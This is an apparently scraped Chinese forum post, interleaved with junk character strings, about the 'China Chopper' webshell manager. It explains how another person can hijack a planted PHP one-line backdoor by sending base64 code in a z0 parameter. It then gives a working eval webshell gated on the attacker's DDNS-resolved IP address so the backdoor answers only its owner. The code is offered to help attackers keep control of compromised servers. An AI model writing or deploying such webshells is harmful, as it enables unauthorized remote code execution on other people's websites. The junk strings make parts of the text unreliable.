今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
t8 ^! ?/ R! `/ c; ?. ]
- f* D2 s/ Q$ t就算你设置了密码,使用了eval($_REQUEST['moyo']);* _3 P: M+ g- j: z6 h
1 ^- u; j7 y2 H, u4 Q, _6 U
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门+ J4 r' F* G* i
1 ]3 w ?1 d# t/ P
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
# S# K* j1 j/ s% B* C- ]8 I; V8 q" D2 H9 E
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了) ^# j. b9 _$ s8 b- J
* t# u6 @' G" {: F4 Y; ~, ~不知道是设计缺陷还是故意留的后门1 _; p, e$ e$ J9 J
9 K$ I% G" U( ?# O2 i: R如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用; A8 j& S9 O v9 ]% b+ q7 o9 T
; Y+ A( y& z' N% n2 {. V
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
# e4 e% L1 W* ^& H/ t' R7 k, X! p- f9 Y! e9 F
然后一句话后门这样写
) G6 J' p5 G0 M
3 z( y- J' p$ {8 h: a<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>8 n! y, m+ T& I! y6 @" E. T
这样就可以让一句话后门只允许自己的电脑连接了# G/ G+ I' [# }/ D9 [/ ?
# t: I) r9 _2 ^ |